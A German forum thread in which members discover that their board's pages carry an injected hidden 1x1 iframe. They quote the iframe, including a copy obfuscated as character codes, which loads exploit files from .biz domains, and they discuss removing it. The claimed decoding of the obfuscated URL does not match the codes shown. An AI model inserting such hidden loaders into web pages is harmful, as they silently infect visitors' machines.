Zum Inhalt springen

Verbesserungsvorschläge Forum


Gecki

Empfohlene Beiträge

Also am Forum liegt das mit Sicherheit nicht...

Das Verlinken von Bildern ist generell nicht ganz unproblematisch, Stichwort Bandbreitenklau...

Wenn hier Bilder von einem anderen Server (z. B. Discogs) verlinkt werden, entsteht diesem Traffic wenn bei uns jemand das Bild über den Browser ansieht.

Traffic verursacht zudem Kosten und das haben die meisten nicht so gerne. Teilweise wird dagegen auch vorgegangen, man erhält dann manchmal statt des Bildes was man verlinken wollte den Hinweis auf den Bilder- bzw. Traffic-Klau...

Ich würde generell empfehlen, Bilder, die ihr woanders hernehmt runterzuladen, bei imageshack hochzzuladen und von dort aus zu verlinken - das funktioniert in jedem Fall und ist für beide Seiten die beste Lösung! :zungeraus:

Link zu diesem Kommentar
  • Antworten 445
  • Erstellt
  • Letzte Antwort

Top-Benutzer in diesem Thema

Nur mal so...

Habe nuns chon 4-5 mal User gesehen die sich am registrieren waren. Aber wir haben seit dem "Admin Member" keinen neuen User mehr bekommen.

Habe auch vor einer Woche mal einen Internetfreund die GFU Seite gezeig tund er konnte sich nicht hier registrieren...

Kommt mir alles etwas spanisch vor..

Link zu diesem Kommentar
  • 2 Wochen später...

Sagt mal, habt Ihr wenn Ihr auf dieses Forum kommt auch ne aufforderund ne Datei zu öffnen oder downloaden? Der Download wird zwar geblockt, aber mein Vierenscanner meldet sich ständig wenn ich auf diese Seite kommen, ich musste es aus machen.

Die Datei heisst.

Name: xpladv618.wmf

Typ: Unbekannter Dateityp, 15,6KB

Von: xepxaxmxsu.biz

Habt Ihr das auch?

Link zu diesem Kommentar

Ohje, hast Recht! Da stimmt was nicht. Mein AntiVir hat gleich 5x Alarm geschlagen.

Passieren tuts aber nur mit dem Internet Explorer. Mit Firefox passiert gar nichts. Ich weiß ja, warum ich den IE nicht mag!

Bearbeitet von [D4v3|R4v3]
Link zu diesem Kommentar

Hm, habe vorhin auch gerade eine Meldung von meinem Internet Security bekommen, dass ein unberechtigter Zugriff blockiert wurde, war schon das zweite mal heute. Weiß jetzt nicht, ob es dasselbe wie bei euch ist, aber es würde ja passen, da diese Meldung sonst nur sehr selten bei mir auftaucht.

Link zu diesem Kommentar

Ganz oben in der Mitte (oberhalb des blauen Balkens) ist ein kleiner schwarzer Punkt:

<iframe src="http://xepxaxmxsu.biz/dl/adv618.php" height="1" width="1"></iframe>

Welches ****** hat denn das da reingepflanzt *grml*

EDIT: Aha, jetzt ist es weg ...

Bearbeitet von [D4v3|R4v3]
Link zu diesem Kommentar

Ja danke für eure Hinweise, ich habe mir sogleich mal das Problem angesehen, und Dank deines Hinweises Dave konnte ich das blitzschnell beheben - Danke nochmal!! :umarmen2:

Das ist einer von vielen Gründen weshalb wir so schnell wie möglich auf die neue Forum-Version umsteigen wollen, aber noch ist dazu nicht genug Geld zusammen - wir brauchen also weiter Mitglieder die GFU aktiv unterstützen.

Daher nochmal der Aufruf: Werdet Premium-Mitglied und sichert den Fortbestand von GFU!

Link zu diesem Kommentar
Das ist einer von vielen Gründen weshalb wir so schnell wie möglich auf die neue Forum-Version umsteigen wollen, aber noch ist dazu nicht genug Geld zusammen - wir brauchen also weiter Mitglieder die GFU aktiv unterstützen.

Magst du da mal absolute Zahlen nennen, damit zumindest wir wissen, in welchen Verhältnissen wir uns momentan bewegen? Wieviele € gespendet wurden, abzüglich Erhaltungskosten. Kosten für Version 2:

(Kostenpunkt $ 200 für eine lebenslange Lizenz)
(Quelle: http://www.ayom.com/faq/foren-software-inv...ard-a-510.html)
Link zu diesem Kommentar
Sagt mal, habt Ihr wenn Ihr auf dieses Forum kommt auch ne aufforderund ne Datei zu öffnen oder downloaden? Der Download wird zwar geblockt, aber mein Vierenscanner meldet sich ständig wenn ich auf diese Seite kommen, ich musste es aus machen.

Die Datei heisst.

Name: xpladv618.wmf

Typ: Unbekannter Dateityp, 15,6KB

Von: xepxaxmxsu.biz

Habt Ihr das auch?

Öhm, hab jetzt grad auch ne "wmf" Virus meldung... :daumenhoch:

Link zu diesem Kommentar
Jo, der kleine Punkt ist wieder da, ganz links unten auf der Seite :dancingbear:

...weiterhin unter FF keine Probleme.

Edit:

Hier wird über dieses Problem gesprochen (in engl. Sprache). Dort wird auch erklärt, was sich hinter dem Punkt verbergen könnte (man beachte den Beitrag vom "11-27-2006, 03:31 PM" und "11-27-2006, 03:46 PM":

I think I found it in the page source. I opted to view the page source for the main forums and did a quick search for 'htm'.

The last line of the page source reads:

<iframe src="http://zebxmzrbsx.biz/dl/adv631.php" width=1 height=1></iframe>

</body >

</html >

The message we're getting told me the threat was coming from 'zebxmrbsx.biz'. That code is creating a frame 1 pixel by 1 pixel. I don't know where to go from there though.

und...

I bet you that small php code is what allows so many spam bots to register. I've been getting roughly 20 per day that DO get through, and about 100 or so that get blocked...sheesh. Will try to get to the bottom of it today.
Bearbeitet von Jan
Link zu diesem Kommentar

Im Quelltext steht:

<iframe src=" 104; 116; 116; 112; 58; 47; 47; 120; 101; 112; 120; 97; 120; 109; 120; 115; 117; 46; 98; 105; 122; 47; 100; 108; 47; 97; 100; 118; 54; 51; 49; 46; 112; 104; 112;" width=1 height=1></iframe>
was dann auscodiert die frame src "http://xbfsrepztq.biz/dl/adv452.php" ergibt.

Der Host des Forums wird anscheinend gehackt!

Dieser Patch sollte das daraus resultierende Sicherheitsrisiko u.a. reduzieren.

Allen Forumsusern empflehle ich zudem ein Update der Anti-Viren-Software!

Link zu diesem Kommentar

Ich hab es mal wieder entfernt - allerdings sehe ich leider nicht viele Möglichkeiten zu verhindern dass es wieder passiert. :/

Eine Idee hab ich noch, glaube aber nicht dass das helfen würde...

Ich werde wenn das weiter geht mal unseren Server-Betreiber kontaktieren und auf das Problem aufmerksam machen - vielen Dank schonmal für die gesammelten Fakten! :dancingbear:

Link zu diesem Kommentar

Ich wiederhole mich gerne, am Wirkungsvollsten ist ein Wechsel auf die neue und wesentlich sicherere Forensoftware...

Ich hab mich mal umgehört und dabei kam raus dass auch andere Foren von Invision (Version 1.3) betroffen waren, auf anderen Servern.

Ich werde mich noch weiter umsehen ob man was tun kann.

Link zu diesem Kommentar
Ich wiederhole mich gerne, am Wirkungsvollsten ist ein Wechsel auf die neue und wesentlich sicherere Forensoftware...

Ich hab mich mal umgehört und dabei kam raus dass auch andere Foren von Invision (Version 1.3) betroffen waren, auf anderen Servern.

Ich werde mich noch weiter umsehen ob man was tun kann.

ein glück das mich da niemand fragt :D

also es sind zwar größtenteils IPB 1.3-Boards betroffen, aber auch 2.xx-er sowie phpBB (aber weniger)

Link zu diesem Kommentar
Mal was anderes, nämlich eine erfreuliche Nachricht:

Das Laden von Dateianhängen funktioniert nun wieder ganz normal.

Für alle Premium-Mitglieder heißt dass ihr könnt die Upload-Funktion nun wieder uneingeschränkt nutzen! :anstossen:

naja ... ich kann aber z.B. keine Excel Listen uppen ... des ist schon doof :(

Link zu diesem Kommentar

Erstelle ein Benutzerkonto oder melde Dich an, um zu kommentieren

Du musst ein Benutzerkonto haben, um einen Kommentar verfassen zu können

Benutzerkonto erstellen

Neues Benutzerkonto für unsere Community erstellen. Es ist einfach!

Neues Benutzerkonto erstellen

Anmelden

Du hast bereits ein Benutzerkonto? Melde Dich hier an.

Jetzt anmelden

  • Wer ist Online

    • Keine registrierten Benutzer online.
×
×
  • Neu erstellen...